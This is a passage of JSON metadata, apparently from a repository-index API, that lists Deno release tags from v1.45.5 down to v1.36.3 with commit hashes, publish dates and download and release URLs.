1T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.gith